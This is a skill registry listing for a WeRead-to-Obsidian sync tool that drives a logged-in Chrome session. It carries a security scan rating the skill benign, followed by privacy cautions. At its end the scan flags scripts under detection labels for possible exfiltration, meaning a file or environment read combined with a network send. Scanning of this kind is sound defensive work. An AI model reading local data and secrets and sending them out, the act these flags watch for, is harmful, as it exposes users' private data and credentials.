Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
weread_assitant
v1.0.1Sync WeRead shelf state, reading progress, visible book content, and note-ready Markdown into a local workspace using the user's logged-in Chrome session. Us...
⭐ 0· 20·0 current·0 all-time
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
Capability signals
These labels describe what authority the skill may exercise. They are separate from suspicious or malicious moderation verdicts.
OpenClaw
Benign
high confidencePurpose & Capability
The skill claims to sync WeRead visible content into Obsidian and the code implements exactly that: it drives a local CDP proxy (http://localhost:3456), evaluates DOM extraction scripts, writes JSON/Markdown under output/, and calls obsidian-cli to publish notes. Required external pieces (Chrome logged-in session, Chrome remote debugging, and a local CDP proxy provided by a 'web-access' skill) are documented in SKILL.md. There are no unrelated credentials, third-party cloud APIs, or surprising binaries requested.
Instruction Scope
Runtime instructions and scripts consistently limit what is collected to visible DOM/text and metadata for a shelf or one book, and the SKILL.md + SECURITY.md explicitly state they do not read cookies or browser storage. The scripts execute page-level JS via CDP to extract text, then write local files and optionally call obsidian-cli. Note: because the skill loads pages in your already-logged-in Chrome session, the browser will send cookies to WeRead when loading pages (the code does not programmatically read cookie/localStorage values, but page loads will be authenticated by the browser). This is expected for the described use but is a privacy consideration.
Install Mechanism
There is no automated install script or external downloads; the repo is instruction-only and uses local node scripts. This minimizes installation risk — nothing is fetched from remote URLs or installed automatically by the skill itself.
Credentials
The skill requests no environment variables or secrets. It does require local capabilities: a running Chrome instance with remote debugging enabled and a local CDP proxy (http://localhost:3456), plus obsidian-cli if you want automated publishing. These requirements are proportionate to the purpose, but they do grant the skill the ability to read personal reading data from your logged-in browser and to modify an Obsidian vault via obsidian-cli; ensure you trust obsidian-cli and the local environment providing the CDP proxy.
Persistence & Privilege
The skill does not request 'always: true' or other elevated platform privileges. It writes files under its own output/ workspace and invokes obsidian-cli to publish notes; it does not modify other skills or system-wide agent config. Autonomous invocation is allowed (platform default) but not combined with unusual privileges.
Assessment
This skill appears to do what it claims, but review these points before installing:
- Understand local access: it drives your local Chrome (via a CDP proxy) and will load WeRead pages using your existing login — the browser will send your session cookies to WeRead even though the code does not read cookie/localStorage values itself. Only run it on machines you control.
- obsidian-cli trust: publishing is done by invoking obsidian-cli with the generated Markdown. Confirm obsidian-cli is the official tool you installed and that your vault configuration is correct.
- CDP proxy origin: the scripts call a local endpoint (http://localhost:3456). Ensure that proxy is indeed local and not forwarding requests to a remote host you don't control.
- Privacy hygiene: inspect output/ before sharing, avoid bulk exports unless you understand privacy/legal implications, and disable Chrome remote debugging when not in use.
If you need higher assurance, you can audit the small extraction functions (scripts/*) — they are readable and explicitly focus on visible DOM/text extraction — or run the scripts in a sandboxed account/vault first.scripts/cdp-client.mjs:3
Environment variable access combined with network send.
scripts/export-obsidian.mjs:29
File read combined with network send (possible exfiltration).
scripts/sync-book-by-title.mjs:57
File read combined with network send (possible exfiltration).
Patterns worth reviewing
These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing.Like a lobster shell, security has layers — review code before you run it.
latestvk97366f9ernnmprsj8yd377rt984a9gq
License
MIT-0
Free to use, modify, and redistribute. No attribution required.